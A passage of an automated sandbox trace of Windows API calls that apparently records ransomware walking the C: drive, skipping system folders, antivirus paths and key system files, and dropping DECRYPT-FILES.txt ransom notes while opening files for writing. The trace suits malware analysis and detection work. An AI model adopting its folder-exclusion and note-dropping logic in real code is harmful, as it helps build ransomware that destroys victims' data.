[0179.669] lstrcatW (in: lpString1="C:\\Boot\\zh-HK\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\Boot\\zh-HK\\bootmgr.exe.mui" [0179.669] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.669] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.669] CloseHandle (hObject=0x0) returned 0 [0179.670] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.670] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.670] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.670] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.670] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.670] CloseHandle (hObject=0xffffffff) returned 0 [0179.670] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0179.670] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0179.670] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0179.670] lstrcatW (in: lpString1="zh-TW", lpString2="\\" | out: lpString1="zh-TW\\") returned="zh-TW\\" [0179.670] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-TW\\" | out: lpString1="C:\\Boot\\zh-TW\\") returned="C:\\Boot\\zh-TW\\" [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Program Files") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch=":\\Windows") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Games\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\All Users") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="AhnLab") returned 0x0 [0179.670] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.670] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0179.671] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.671] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-TW\\\\0a16c9.tmp") returned 25 [0179.671] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\\\0a16c9.tmp" (normalized: "c:\\boot\\zh-tw\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.671] GetLastError () returned 0x5 [0179.671] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0179.671] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.671] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-TW\\\\DECRYPT-FILES.txt") returned 32 [0179.671] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-tw\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.672] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0179.672] lstrcatW (in: lpString1="C:\\Boot\\zh-TW\\", lpString2="*" | out: lpString1="C:\\Boot\\zh-TW\\*") returned="C:\\Boot\\zh-TW\\*" [0179.672] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.672] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.672] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.672] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.672] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.672] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.672] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.673] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.673] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.673] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.673] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.673] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.673] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.673] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0179.673] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.673] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\zh-TW\\" | out: lpString1="C:\\Boot\\zh-TW\\") returned="C:\\Boot\\zh-TW\\" [0179.673] lstrcatW (in: lpString1="C:\\Boot\\zh-TW\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\Boot\\zh-TW\\bootmgr.exe.mui" [0179.673] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.673] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.673] CloseHandle (hObject=0x0) returned 0 [0179.673] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.674] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.674] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.674] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.674] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.674] CloseHandle (hObject=0xffffffff) returned 0 [0179.674] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW\\", cAlternateFileName="")) returned 0 [0179.674] FindClose (in: hFindFile=0x479738 | out: hFindFile=0x479738) returned 1 [0179.674] CloseHandle (hObject=0xffffffff) returned 0 [0179.674] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x77124864, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0179.674] lstrcmpiW (lpString1="bootmgr", lpString2="DECRYPT-FILES.txt") returned -1 [0179.674] lstrcmpiW (lpString1="bootmgr", lpString2="autorun.inf") returned 1 [0179.674] lstrcmpiW (lpString1="bootmgr", lpString2="boot.ini") returned 1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="desktop.ini") returned -1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat") returned -1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="iconcache.db") returned -1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="bootsect.bak") returned -1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat.log") returned -1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="thumbs.db") returned -1 [0179.675] lstrcmpiW (lpString1="bootmgr", lpString2="Bootfont.bin") returned 1 [0179.675] lstrlenW (lpString="C:\\") returned 3 [0179.675] lstrlenW (lpString="bootmgr") returned 7 [0179.675] lstrcpyW (in: lpString1=0x36ff44c, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0179.675] lstrcatW (in: lpString1="C:\\", lpString2="bootmgr" | out: lpString1="C:\\bootmgr") returned="C:\\bootmgr" [0179.675] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.675] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.675] CloseHandle (hObject=0x0) returned 0 [0179.675] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.675] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x77124864, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0179.675] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="DECRYPT-FILES.txt") returned -1 [0179.675] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="autorun.inf") returned 1 [0179.676] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="boot.ini") returned 1 [0179.676] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="desktop.ini") returned -1 [0179.676] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0179.676] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="iconcache.db") returned -1 [0179.676] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootsect.bak") returned 0 [0179.676] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77124864, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0179.676] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0179.676] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0179.676] lstrcatW (in: lpString1="Config.Msi", lpString2="\\" | out: lpString1="Config.Msi\\") returned="Config.Msi\\" [0179.676] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Program Files") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch=":\\Windows") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Games\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\All Users") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="AhnLab") returned 0x0 [0179.676] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.676] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0179.676] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.676] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Config.Msi\\\\0a16c9.tmp") returned 25 [0179.676] CreateFileW (lpFileName="C:\\Config.Msi\\\\0a16c9.tmp" (normalized: "c:\\config.msi\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.676] GetLastError () returned 0x5 [0179.677] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0179.677] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.677] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Config.Msi\\\\DECRYPT-FILES.txt") returned 32 [0179.677] CreateFileW (lpFileName="C:\\Config.Msi\\\\DECRYPT-FILES.txt" (normalized: "c:\\config.msi\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.678] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0179.678] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*" | out: lpString1="C:\\Config.Msi\\*") returned="C:\\Config.Msi\\*" [0179.678] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW\\", cAlternateFileName="苟眔酯ﲨͯ")) returned 0xffffffff [0179.678] CloseHandle (hObject=0xffffffff) returned 0 [0179.678] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa696e700, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa696e700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa696e700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x77124864, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.678] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.678] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0179.678] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0179.678] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0179.678] lstrcatW (in: lpString1="Documents and Settings", lpString2="\\" | out: lpString1="Documents and Settings\\") returned="Documents and Settings\\" [0179.678] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Program Files") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch=":\\Windows") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Games\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\All Users") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="AhnLab") returned 0x0 [0179.678] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.678] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0179.678] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.678] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Documents and Settings\\\\0a16c9.tmp") returned 37 [0179.678] CreateFileW (lpFileName="C:\\Documents and Settings\\\\0a16c9.tmp" (normalized: "c:\\documents and settings\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.679] GetLastError () returned 0x5 [0179.679] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0179.679] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.679] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Documents and Settings\\\\DECRYPT-FILES.txt") returned 44 [0179.679] CreateFileW (lpFileName="C:\\Documents and Settings\\\\DECRYPT-FILES.txt" (normalized: "c:\\documents and settings\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.680] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0179.681] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*" | out: lpString1="C:\\Documents and Settings\\*") returned="C:\\Documents and Settings\\*" [0179.681] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW\\", cAlternateFileName="苟眔酯ﲨͯ")) returned 0xffffffff [0179.681] CloseHandle (hObject=0xffffffff) returned 0 [0179.681] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xdabf4220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="DECRYPT-FILES.txt") returned 1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="autorun.inf") returned 1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="boot.ini") returned 1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="desktop.ini") returned 1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat") returned -1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="iconcache.db") returned -1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="bootsect.bak") returned 1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat.log") returned -1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="thumbs.db") returned -1 [0179.681] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Bootfont.bin") returned 1 [0179.681] lstrlenW (lpString="hiberfil.sys") returned 12 [0179.681] 